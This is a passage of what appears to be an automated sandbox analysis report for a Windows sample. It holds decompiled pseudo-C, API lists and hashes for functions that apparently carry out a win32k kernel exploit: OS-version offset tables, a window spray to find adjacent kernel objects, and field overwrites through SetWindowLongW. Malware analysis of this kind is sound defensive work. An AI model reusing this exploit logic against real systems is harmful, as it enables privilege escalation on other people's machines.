279 93c371-93c37e 277->279 280 93c328-93c33f CreateThread 277->280 279->272 279->275 281 93c340-93c347 280->281 282 93c39a-93c39d 281->282 283 93c349-93c351 Sleep 281->283 284 93c353-93c36b DestroyWindow * 2 TerminateThread 282->284 285 93c39f-93c3e0 CreateWindowExW 282->285 283->281 283->284 284->279 286 93c453-93c486 DestroyWindow * 2 TerminateThread WaitForSingleObject 285->286 287 93c3e2-93c451 GetWindowLongW SetWindowLongW * 2 keybd_event * 4 Sleep 285->287 286->279 288 93c48c-93c49e 286->288 287->286 288->279 289 93c4a4-93c4ae call 93b6e0 288->289 289->279
                      C-Code - Quality: 84%
                      			E0093C090(void* __ebx, void* __edx, void* __esi) {
				signed int _v8;
				short _v10;
				short _v2008;
				char _v3032;
				signed int _v3036;
				intOrPtr _v3040;
				intOrPtr _v3044;
				struct _WNDCLASSEXW _v3092;
				void* __edi;
				signed int _t49;
				struct HWND__* _t64;
				signed int _t65;
				intOrPtr _t69;
				struct HWND__* _t71;
				intOrPtr _t76;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t98;
				intOrPtr _t105;
				intOrPtr _t121;
				intOrPtr _t126;
				void* _t128;
				void* _t129;
				void* _t146;
				void* _t147;
				signed int _t150;
				void* _t151;
				void* _t152;
				void* _t154;
				signed int _t156;
				signed int _t157;
				void* _t158;
				void* _t159;
				struct _SECURITY_ATTRIBUTES* _t160;
				signed int _t164;

				_t155 = __esi;
				_t146 = __edx;
				_t125 = __ebx;
				_t49 =  *0x943050; // 0xce43520a
				_v8 = _t49 ^ _t164;
				if( *0x957fe8 == 0 ||  *0x957fec == 0) {
					return E0093161C(_t125, _v8 ^ _t164, _t146, _t147, _t155);
				} else {
					_push(_t147);
					_v3092.cbSize = 0x30;
					_v3092.cbClsExtra = 0;
					_v3092.cbWndExtra = 0;
					memset( &_v2008, 0x610061, 0x64 << 2);
					asm("xorps xmm0, xmm0");
					_v10 = 0;
					_v3092.style = 0;
					_v3092.lpfnWndProc = DefWindowProcW;
					_v3092.hInstance =  *0x958030;
					asm("movdqu [ebp-0xbf8], xmm0");
					_v3092.lpszClassName = L"MyExtraWnd";
					_v3092.hIconSm = 0;
					if(RegisterClassExW( &_v3092) != 0) {
						E00935A90( &_v3032, 0, 0x400);
						_t150 = 0;
						while(1) {
							_t64 = CreateWindowExW(0, L"MyExtraWnd",  &_v2008, 0, 0, 0, 0, 0, 0, 0,  *0x958030, 0);
							 *(_t164 + _t150 * 4 - 0xbd4) = _t64;
							if(_t64 == 0) {
								break;
							}
							_t150 = _t150 + 1;
							if(_t150 < 0x100) {
								continue;
							}
							break;
						}
						_t65 = 0;
						_push(_t125);
						_v3036 = 0;
						_push(_t155);
						do {
							_t66 =  *((intOrPtr*)(_t164 + _t65 * 4 - 0xbd4));
							_t156 = 0;
							_v3040 =  *((intOrPtr*)(_t164 + _t65 * 4 - 0xbd4));
							while(1) {
								_t126 =  *((intOrPtr*)(E0093C750(_t66) + 0x10));
								_t69 =  *((intOrPtr*)(E0093C750( *((intOrPtr*)(_t164 + _t156 * 4 - 0xbd4))) + 0x10));
								_v3044 = _t69;
								if(_t126 < _t69 && _t126 + 0x40000 > _t69 + 0x300) {
									break;
								}
								_t156 = _t156 + 1;
								if(_t156 <= _t150) {
									_t66 = _v3040;
									continue;
								}
								L14:
								if( *0x958004 == 0 ||  *0x958010 == 0) {
									goto L16;
								}
								goto L17;
							}
							 *0x958004 = _v3040;
							 *0x958010 =  *((intOrPtr*)(_t164 + _t156 * 4 - 0xbd4));
							 *0x958008 = E0093C750(_v3040);
							 *0x958014 = E0093C750( *((intOrPtr*)(_t164 + _t156 * 4 - 0xbd4)));
							 *0x95800c = _t126;
							 *0x958018 = _v3044;
							 *0x958020 =  *((intOrPtr*)( *0x958008 + 8));
							_t121 =  *0x957fe8; // 0x0
							 *0x95801c =  *0x95800c + _t121 + 0xfffffffc;
							goto L14;
							L16:
							_t65 = _v3036 + 1;
							_v3036 = _t65;
						} while (_t65 <= _t150);
						L17:
						_t157 = 0;
						do {
							_t71 =  *(_t164 + _t157 * 4 - 0xbd4);
							if(_t71 !=  *0x958004 && _t71 !=  *0x958010) {
								DestroyWindow(_t71);
							}
							_t157 = _t157 + 1;
						} while (_t157 < 0x100);
						if( *0x958004 == 0 ||  *0x958010 == 0) {
							_pop(_t158);
							_pop(_t128);
							_pop(_t151);
							return E0093161C(_t128, _v8 ^ _t164, _t146, _t151, _t158);
						} else {
							if( *0x958024 == 0) {
								while(1) {
									_t76 =  *0x9441a0; // 0xa
									if( *0x958034 >= _t76) {
										goto L33;
									}
									 *0x958048 = 0;
									 *0x95804c = 0;
									 *0x958044 = 0;
									if( *0x958024 == 0) {
										_t160 = 0;
										 *0x958038 = CreateThread(0, 0, E0093B970, 0, 0, 0);
										while( *0x958044 == 0) {
											_t160 =  &(_t160->nLength);
											Sleep(0x32);
											if(_t160 < 0x14) {
												continue;
											} else {
												L31:
												DestroyWindow( *0x958048);
												DestroyWindow( *0x95804c);
												TerminateThread( *0x958038, 0xffffffff);
											}
											goto L32;
										}
										if(_t160 >= 0x14) {
											goto L31;
										} else {
											_t85 =  *0x9441a8; // 0x258
											_t87 =  *0x9441a4; // 0x320
											 *0x95804c = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t87 + 1, _t85 + 1, 1, 1, 0, 0,  *0x958030, 0);
											if( *0x95804c != 0) {
												SetWindowLongW( *0x95804c, 0xfffffff0, GetWindowLongW( *0x95804c, 0xfffffff0) | 0x40000000);
												_t105 =  *0x957fec; // 0x0
												SetWindowLongW( *0x95804c, 0xfffffff4,  *0x95800c + _t105 + 0xffffffef);
												keybd_event(0x12, 0, 0, 0);
												keybd_event(0x1b, 0, 0, 0);
												keybd_event(0x1b, 0, 2, 0);
												keybd_event(0x12, 0, 2, 0);
												Sleep(0x64);
											}
											DestroyWindow( *0x958048);
											DestroyWindow( *0x95804c);
											TerminateThread( *0x958038, 0xffffffff);
											WaitForSingleObject( *0x958038, 0xffffffff);
											if( *0x958024 == 0) {
												_t98 =  *0x957fec; // 0x0
												if( *((intOrPtr*)( *0x958008 + _t98)) >= 0x4000000) {
													 *0x958024 = E0093B6E0();
												}
											}
											goto L32;
										}
										goto L42;
									}
									L32:
									 *0x958034 =  *0x958034 + 1;
									if( *0x958024 == 0) {
										continue;
									}
									goto L33;
								}
							}
							L33:
							_pop(_t159);
							_pop(_t129);
							_pop(_t152);
							return E0093161C(_t129, _v8 ^ _t164, _t146, _t152, _t159);
						}
					} else {
						_pop(_t154);
						return E0093161C(__ebx, _v8 ^ _t164, _t146, _t154, __esi);
					}
				}
				L42:
			}






































                      0x0093c090
                      0x0093c090
                      0x0093c090
                      0x0093c099
                      0x0093c0a0
                      0x0093c0aa
                      0x0093c4d5
                      0x0093c0bd
                      0x0093c0bd
                      0x0093c0c3
                      0x0093c0d2
                      0x0093c0e2
                      0x0093c0ec
                      0x0093c0f0
                      0x0093c0f3
                      0x0093c0f7
                      0x0093c102
                      0x0093c10d
                      0x0093c11a
                      0x0093c122
                      0x0093c12c
                      0x0093c13f
                      0x0093c160
                      0x0093c168
                      0x0093c170
                      0x0093c194
                      0x0093c19a
                      0x0093c1a3
                      0x00000000
                      0x00000000
                      0x0093c1a5
                      0x0093c1ac
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093c1ac
                      0x0093c1ae
                      0x0093c1b0
                      0x0093c1b1
                      0x0093c1b7
                      0x0093c1c0
                      0x0093c1c0
                      0x0093c1c7
                      0x0093c1c9
                      0x0093c1d0
                      0x0093c1dd
                      0x0093c1e5
                      0x0093c1e8
                      0x0093c1f0
                      0x00000000
                      0x00000000
                      0x0093c202
                      0x0093c205
                      0x0093c207
                      0x00000000
                      0x0093c207
                      0x0093c271
                      0x0093c278
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093c278
                      0x0093c21c
                      0x0093c221
                      0x0093c22d
                      0x0093c238
                      0x0093c243
                      0x0093c249
                      0x0093c256
                      0x0093c25b
                      0x0093c26b
                      0x00000000
                      0x0093c283
                      0x0093c289
                      0x0093c28a
                      0x0093c290
                      0x0093c298
                      0x0093c29e
                      0x0093c2a0
                      0x0093c2a0
                      0x0093c2ad
                      0x0093c2b8
                      0x0093c2b8
                      0x0093c2ba
                      0x0093c2bb
                      0x0093c2ca
                      0x0093c4b3
                      0x0093c4b4
                      0x0093c4b7
                      0x0093c4c5
                      0x0093c2dd
                      0x0093c2e4
                      0x0093c2f0
                      0x0093c2f0
                      0x0093c2fb
                      0x00000000
                      0x00000000
                      0x0093c301
                      0x0093c30b
                      0x0093c315
                      0x0093c326
                      0x0093c328
                      0x0093c33a
                      0x0093c340
                      0x0093c34b
                      0x0093c34c
                      0x0093c351
                      0x00000000
                      0x0093c353
                      0x0093c353
                      0x0093c359
                      0x0093c361
                      0x0093c36b
                      0x0093c36b
                      0x00000000
                      0x0093c351
                      0x0093c39d
                      0x00000000
                      0x0093c39f
                      0x0093c3a7
                      0x0093c3b6
                      0x0093c3d4
                      0x0093c3e0
                      0x0093c404
                      0x0093c406
                      0x0093c41f
                      0x0093c42f
                      0x0093c439
                      0x0093c443
                      0x0093c44d
                      0x0093c451
                      0x0093c451
                      0x0093c459
                      0x0093c461
                      0x0093c46b
                      0x0093c479
                      0x0093c486
                      0x0093c492
                      0x0093c49e
                      0x0093c4a9
                      0x0093c4a9
                      0x0093c49e
                      0x00000000
                      0x0093c486
                      0x00000000
                      0x0093c39d
                      0x0093c371
                      0x0093c371
                      0x0093c37e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093c37e
                      0x0093c2f0
                      0x0093c384
                      0x0093c389
                      0x0093c38a
                      0x0093c38b
                      0x0093c399
                      0x0093c399
                      0x0093c141
                      0x0093c143
                      0x0093c151
                      0x0093c151
                      0x0093c13f
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$ClassCreateDestroyRegister_memset
                      • String ID: 0$MyExtraWnd$MyMainWnd
                      • API String ID: 1202089904-3217463316
                      • Opcode ID: 271261a2dcca78167b595e7fe9ac8d408c28f692e9f97e4b3a934a4d69e6b9a4
                      • Instruction ID: 3202a7cc09f35e6bf18389ab78518a0d852e0df8a6e27500f7c2ac3180a31f74
                      • Opcode Fuzzy Hash: 271261a2dcca78167b595e7fe9ac8d408c28f692e9f97e4b3a934a4d69e6b9a4
                      • Instruction Fuzzy Hash: 6FB1B0B0A28714DFDB60DFB5EC45BAA77A8FB08315F100155E919B72E0DBB4A884EF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093BA30 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 209sleepregistrylibraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 292 93ba30-93ba78 Sleep GetModuleHandleA LoadLibraryA 293 93ba7a-93ba8b call 93161c 292->293 294 93ba8e-93baaf GetVersionExW 292->294 296 93bab5-93babc 294->296 297 93bc59-93bcc5 RegisterClassExW 294->297 300 93bae4-93baed GetModuleHandleA 296->300 301 93babe-93bac5 296->301 297->293 299 93bccb-93bcfd GetSystemMetrics * 2 CreateThread 297->299 302 93bd60-93bd75 call 93161c 299->302 303 93bcff-93bd07 299->303 305 93bb5b-93bb6c IsWow64Process 300->305 306 93baef-93baff 300->306 301->300 304 93bac7-93bad5 301->304 308 93bd39-93bd5e TerminateThread Sleep keybd_event * 2 303->308 309 93bd09 303->309 304->305 310 93badb-93bae2 304->310 305->293 307 93bb72-93bb79 305->307 311 93bb01-93bb03 306->311 312 93bb48-93bb4b 306->312 307->293 316 93bb7f-93bbde call 93bf60 call 93bd80 307->316 308->302 317 93bd10-93bd1b 309->317 310->305 318 93bb11-93bb14 311->318 319 93bb05-93bb0f 311->319 312->293 315 93bb51 312->315 315->305 316->293 331 93bbe4-93bbe6 316->331 317->308 323 93bd1d-93bd29 317->323 320 93bb22-93bb25 318->320 321 93bb16-93bb20 318->321 319->305 324 93bb33-93bb36 320->324 325 93bb27-93bb31 320->325 321->305 323->308 327 93bd2b-93bd37 Sleep 323->327 324->293 328 93bb3c-93bb46 324->328 325->305 327->308 327->317 328->305 331->293 332 93bbec-93bbf3 331->332 333 93bbf5-93bbfe GetModuleHandleA 332->333 334 93bc09-93bc10 332->334 333->334 335 93bc00-93bc07 333->335 336 93bc12-93bc1b GetModuleHandleA 334->336 337 93bc24-93bc54 334->337 335->337 336->337 338 93bc1d 336->338 337->297 338->337
                      C-Code - Quality: 81%
                      			E0093BA30(void* __ebx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				char _v10;
				struct _OSVERSIONINFOW _v292;
				int _v296;
				struct _WNDCLASSEXW _v344;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t57;
				signed int _t58;
				struct HINSTANCE__* _t61;
				int* _t62;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t69;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int _t75;
				signed int _t79;
				signed int _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				signed int _t94;
				void* _t95;
				void* _t96;
				void* _t98;
				signed int _t99;

				_t94 = __edx;
				_t86 = __ebx;
				_t37 =  *0x943050; // 0xce43520a
				_v8 = _t37 ^ _t99;
				_t95 = Sleep;
				_v296 = 0;
				Sleep(0xc8);
				_t96 = GetModuleHandleA;
				 *0x958030 = GetModuleHandleA(0);
				if(LoadLibraryA("USER32.dll") != 0) {
					 *0x95802c = _a4;
					_v292.dwOSVersionInfoSize = 0x11c;
					if(GetVersionExW( &_v292) == 0) {
						L30:
						asm("xorps xmm0, xmm0");
						_v344.hInstance =  *0x958030;
						_v344.cbSize = 0x30;
						_v344.style = 0;
						_v344.lpfnWndProc = E0093D960;
						_v344.cbClsExtra = 0;
						_v344.cbWndExtra = 0;
						asm("movdqu [ebp-0x13c], xmm0");
						_v344.lpszClassName = L"MyMainWnd";
						_v344.hIconSm = 0;
						if(RegisterClassExW( &_v344) == 0) {
							goto L1;
						} else {
							_t97 = GetSystemMetrics;
							_push(_t86);
							 *0x9441a4 = GetSystemMetrics(0);
							 *0x9441a8 = GetSystemMetrics(1);
							_t87 = CreateThread(0, 0, E0093C090, 0, 0, 0);
							if(_t87 != 0) {
								_t98 = 0;
								if( *0x958024 == 0) {
									while(1) {
										_t57 =  *0x9441a0; // 0xa
										if( *0x958034 >= _t57) {
											goto L37;
										}
										_t58 =  *0x9441a0; // 0xa
										if(_t98 < _t58 + _t58 * 4 + _t58 + _t58 * 4) {
											Sleep(0x64);
											_t98 = _t98 + 1;
											if( *0x958024 == 0) {
												continue;
											}
										}
										goto L37;
									}
								}
								L37:
								TerminateThread(_t87, 0);
								Sleep(0x64);
								_t97 = keybd_event;
								keybd_event(0x1b, 0, 2, 0);
								keybd_event(0x12, 0, 2, 0);
							}
							_pop(_t88);
							return E0093161C(_t88, _v8 ^ _t99, _t94, _t95, _t97);
						}
					} else {
						if(_v292.dwMajorVersion != 5 || _v292.dwMinorVersion < 1) {
							_t61 = GetModuleHandleA("ntdll.dll");
							if(_t61 == 0) {
								goto L19;
							} else {
								_t93 =  *((intOrPtr*)(_t61 + 0x3c));
								_t94 =  *(_t93 + _t61 + 0x40) & 0x0000ffff;
								_t85 =  *(_t93 + _t61 + 0x42) & 0x0000ffff;
								if(_t94 != 6) {
									if(_t94 != 0xa) {
										goto L1;
									} else {
										 *0x9440bc = 0xc;
										goto L19;
									}
								} else {
									if(_t85 != 0) {
										if(_t85 != 1) {
											if(_t85 != 2) {
												if(_t85 != 3) {
													goto L1;
												} else {
													 *0x9440bc = 0xa;
													goto L19;
												}
											} else {
												 *0x9440bc = 8;
												goto L19;
											}
										} else {
											 *0x9440bc = 6;
											goto L19;
										}
									} else {
										 *0x9440bc = 4;
										goto L19;
									}
								}
							}
						} else {
							 *0x9440bc = 0;
							if(_v10 != 1) {
								 *0x9440bc =  *0x9440bc + 2;
							}
							L19:
							_t62 =  &_v296;
							__imp__IsWow64Process(0xffffffff, _t62);
							if(_t62 == 0 || _v296 != 0) {
								goto L1;
							} else {
								_t63 =  *0x9440bc; // 0x0
								 *0x957fe8 =  *((intOrPtr*)(0x9440c0 + _t63 * 4));
								_t65 =  *0x9440bc; // 0x0
								 *0x957ff8 =  *((intOrPtr*)(0x9440f8 + _t65 * 4));
								_t67 =  *0x9440bc; // 0x0
								 *0x957ffc =  *((intOrPtr*)(0x944130 + _t67 * 4));
								_t69 =  *0x9440bc; // 0x0
								 *0x958000 =  *((intOrPtr*)(0x944168 + _t69 * 4));
								 *0x957fe8 = E0093BF60();
								_t72 = E0093BD80();
								 *0x957fec = _t72;
								if( *0x957fe8 == 0 || _t72 == 0) {
									goto L1;
								} else {
									if( *0x9440bc != 0xc || GetModuleHandleA("win32u.dll") == 0) {
										if( *0x9440bc == 0xd && GetModuleHandleA("win32u.dll") != 0) {
											 *0x957ff8 =  *0x957ff8 - 4;
										}
									} else {
										 *0x957ff8 =  *0x957ff8 + 8;
									}
									_t73 =  *0x957fec; // 0x0
									 *0x957ff0 = _t73 + 0xfffffffc;
									_t75 =  *0x957fe0; // 0x0
									asm("sbb eax, eax");
									 *0x957fe4 = ( ~_t75 & 0x00000018) + 0x2a;
									_t79 =  *0x957fe0; // 0x0
									asm("sbb eax, eax");
									 *0x957ff4 = ( ~_t79 & 0x00000024) + 0x34;
									goto L30;
								}
							}
						}
					}
				} else {
					L1:
					return E0093161C(_t86, _v8 ^ _t99, _t94, _t95, _t96);
				}
			}

































                      0x0093ba30
                      0x0093ba30
                      0x0093ba39
                      0x0093ba40
                      0x0093ba45
                      0x0093ba50
                      0x0093ba5a
                      0x0093ba5c
                      0x0093ba6b
                      0x0093ba78
                      0x0093ba91
                      0x0093ba9d
                      0x0093baaf
                      0x0093bc59
                      0x0093bc5e
                      0x0093bc61
                      0x0093bc6e
                      0x0093bc78
                      0x0093bc82
                      0x0093bc8c
                      0x0093bc96
                      0x0093bca0
                      0x0093bca8
                      0x0093bcb2
                      0x0093bcc5
                      0x00000000
                      0x0093bccb
                      0x0093bccb
                      0x0093bcd1
                      0x0093bcd8
                      0x0093bcee
                      0x0093bcf9
                      0x0093bcfd
                      0x0093bcff
                      0x0093bd07
                      0x0093bd10
                      0x0093bd10
                      0x0093bd1b
                      0x00000000
                      0x00000000
                      0x0093bd1d
                      0x0093bd29
                      0x0093bd2d
                      0x0093bd2f
                      0x0093bd37
                      0x00000000
                      0x00000000
                      0x0093bd37
                      0x00000000
                      0x0093bd29
                      0x0093bd10
                      0x0093bd39
                      0x0093bd3c
                      0x0093bd44
                      0x0093bd46
                      0x0093bd54
                      0x0093bd5e
                      0x0093bd5e
                      0x0093bd68
                      0x0093bd75
                      0x0093bd75
                      0x0093bab5
                      0x0093babc
                      0x0093bae9
                      0x0093baed
                      0x00000000
                      0x0093baef
                      0x0093baef
                      0x0093baf2
                      0x0093baf7
                      0x0093baff
                      0x0093bb4b
                      0x00000000
                      0x0093bb51
                      0x0093bb51
                      0x00000000
                      0x0093bb51
                      0x0093bb01
                      0x0093bb03
                      0x0093bb14
                      0x0093bb25
                      0x0093bb36
                      0x00000000
                      0x0093bb3c
                      0x0093bb3c
                      0x00000000
                      0x0093bb3c
                      0x0093bb27
                      0x0093bb27
                      0x00000000
                      0x0093bb27
                      0x0093bb16
                      0x0093bb16
                      0x00000000
                      0x0093bb16
                      0x0093bb05
                      0x0093bb05
                      0x00000000
                      0x0093bb05
                      0x0093bb03
                      0x0093baff
                      0x0093bac7
                      0x0093bacb
                      0x0093bad5
                      0x0093badb
                      0x0093badb
                      0x0093bb5b
                      0x0093bb5b
                      0x0093bb64
                      0x0093bb6c
                      0x00000000
                      0x0093bb7f
                      0x0093bb7f
                      0x0093bb8b
                      0x0093bb90
                      0x0093bb9c
                      0x0093bba1
                      0x0093bbad
                      0x0093bbb2
                      0x0093bbbe
                      0x0093bbc8
                      0x0093bbcd
                      0x0093bbd9
                      0x0093bbde
                      0x00000000
                      0x0093bbec
                      0x0093bbf3
                      0x0093bc10
                      0x0093bc1d
                      0x0093bc1d
                      0x0093bc00
                      0x0093bc00
                      0x0093bc00
                      0x0093bc24
                      0x0093bc2c
                      0x0093bc31
                      0x0093bc38
                      0x0093bc40
                      0x0093bc45
                      0x0093bc4c
                      0x0093bc54
                      0x00000000
                      0x0093bc54
                      0x0093bbde
                      0x0093bb6c
                      0x0093babc
                      0x0093ba7b
                      0x0093ba7b
                      0x0093ba8b
                      0x0093ba8b

                      APIs
                      • Sleep.KERNEL32(000000C8,?,00000000), ref: 0093BA5A
                      • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 0093BA64
                      • LoadLibraryA.KERNEL32(USER32.dll,?,00000000), ref: 0093BA70
                      • GetVersionExW.KERNEL32(?,?,00000000), ref: 0093BAA7
                      • IsWow64Process.KERNEL32(000000FF,00000000,?,00000000), ref: 0093BB64
                      • GetModuleHandleA.KERNEL32(win32u.dll,?,00000000), ref: 0093BBFA
                      • RegisterClassExW.USER32 ref: 0093BCBC
                      • GetSystemMetrics.USER32 ref: 0093BCD4
                      • GetSystemMetrics.USER32 ref: 0093BCDD
                      • CreateThread.KERNEL32 ref: 0093BCF3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: HandleMetricsModuleSystem$ClassCreateLibraryLoadProcessRegisterSleepThreadVersionWow64
                      • String ID: 0$MyMainWnd$USER32.dll$ntdll.dll$win32u.dll
                      • API String ID: 1875908182-450879528
                      • Opcode ID: 9d20ce9f99cd7b50ae21414c2aa293be8aabcaa3cd9cb569bd017e7cf346c700
                      • Instruction ID: f1693c77f0634008dee14a09a905064371cfd11060b10d25613196471560b8d9
                      • Opcode Fuzzy Hash: 9d20ce9f99cd7b50ae21414c2aa293be8aabcaa3cd9cb569bd017e7cf346c700
                      • Instruction Fuzzy Hash: E8818D75A2C314DBDB20CFA5EC45BA9B7F4EB09305F10015AEA04E72E0DBB49994EF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093C790 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0093C790() {
				intOrPtr _t13;
				intOrPtr _t15;
				void* _t19;
				_Unknown_base(*)()* _t23;

				_t23 = GetProcAddress(LoadLibraryA("USER32.dll"), "IsMenu");
				_t19 = 0;
				do {
					if( *((intOrPtr*)(_t19 + _t23)) != 0x2b2) {
						goto L3;
					} else {
						_t19 = _t19 + 2;
						if( *((char*)(_t19 + _t23)) == 0xe8) {
							_t13 =  *((intOrPtr*)(_t19 + _t23 + 1)) + 5 + _t19 + _t23;
							 *0x958054 = _t13;
						} else {
							goto L3;
						}
					}
					L5:
					if(_t13 != 0) {
						return _t13;
					} else {
						 *0x958050 = 1;
						do {
							if( *((intOrPtr*)(_t13 + _t23)) == 0x26a) {
								_t13 = _t13 + 2;
								if( *((char*)(_t13 + _t23)) == 0xe8) {
									_t9 = _t23 + 5; // 0x5
									_t15 = _t9 +  *((intOrPtr*)(_t13 + _t23 + 1)) + _t13;
									 *0x958054 = _t15;
									return _t15;
								}
							}
							_t13 = _t13 + 1;
						} while (_t13 < 0x30);
						return _t13;
					}
					L3:
					_t19 = _t19 + 1;
				} while (_t19 < 0x30);
				_t13 =  *0x958054;
				goto L5;
			}







                      0x0093c7a7
                      0x0093c7a9
                      0x0093c7b0
                      0x0093c7b4
                      0x00000000
                      0x0093c7b6
                      0x0093c7b6
                      0x0093c7bd
                      0x0093c7ff
                      0x0093c801
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093c7bd
                      0x0093c7ca
                      0x0093c7cc
                      0x0093c818
                      0x0093c7ce
                      0x0093c7ce
                      0x0093c7e0
                      0x0093c7e4
                      0x0093c7e6
                      0x0093c7ed
                      0x0093c80e
                      0x0093c811
                      0x0093c813
                      0x00000000
                      0x0093c813
                      0x0093c7ed
                      0x0093c7ef
                      0x0093c7f0
                      0x0093c7f5
                      0x0093c7f5
                      0x0093c7bf
                      0x0093c7bf
                      0x0093c7c0
                      0x0093c7c5
                      0x00000000

                      APIs
                      • LoadLibraryA.KERNEL32(USER32.dll,IsMenu,0093C761,?,0093BF8C,00000000,74656490,?,00000000), ref: 0093C79A
                      • GetProcAddress.KERNEL32(00000000), ref: 0093C7A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: IsMenu$USER32.dll
                      • API String ID: 2574300362-1495665521
                      • Opcode ID: 878b02cd1bb6dbf10737c2cbbb5ba258393a7f1b1344aff79dfd5f22737bb4cc
                      • Instruction ID: 7b96f8f9e283ee73b81bac1ede5b8da5d0136b06cce0e4f696229077dbae5a02
                      • Opcode Fuzzy Hash: 878b02cd1bb6dbf10737c2cbbb5ba258393a7f1b1344aff79dfd5f22737bb4cc
                      • Instruction Fuzzy Hash: E0012BF2A1C6014BC7288F74CC55B6173E5EF41348B08457DD407E72E2EB3484869F04
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009333B8 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009333B8(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                      0x009333bd
                      0x009333cd

                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0093422E,?,?,?,00000000), ref: 009333BD
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 009333C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
